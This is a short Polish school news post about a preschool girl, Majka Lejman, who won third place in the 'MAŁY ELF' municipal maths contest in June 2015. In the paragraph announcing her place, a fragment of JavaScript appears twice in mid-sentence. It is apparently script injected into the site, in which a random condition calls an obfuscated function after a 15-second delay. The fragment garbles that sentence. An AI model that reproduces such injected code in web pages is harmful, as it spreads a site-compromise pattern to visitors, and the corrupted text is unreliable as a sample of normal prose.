III miejsce Mai Lejman w XI edycji konkursu matematycznego MAŁY ELF

W dniu 9 czerwca 2015 roku dzieci z oddziału przedszkolnego wzięły udział w Gminnym Konkursie Matematycznym „MAŁY ELF”, który odbył się w Szkole Podstawowej w Borkowie Kościelnym. Naszą szkołę reprezentowały: Majka Lejman, Gabrysia Chrześcijańska i Zosia Olszewska.

Celem konkursu było wykazanie się wiedzą dotyczącą działań matematycznych przewidzianą programem nauczania dla dzieci 5-6 letnich, wzbudzanie zdrowej rywalizacji między dziećmi oraz integracja dzieci z różnych środowisk.

Po zaciętej walce, ostatecznie, III miejscedom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} zajęła Majka Lejmandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}, która otrzymała dyplom i nagrodę książkową. Po wręczeniu dyplomów odbył się słodki poczęstunek w bardzo miłej atmosferze.

Organizatorom konkursu bardzo dziękujemy za zaproszenie, zaś zwyciężczyni gratulujemy sukcesu.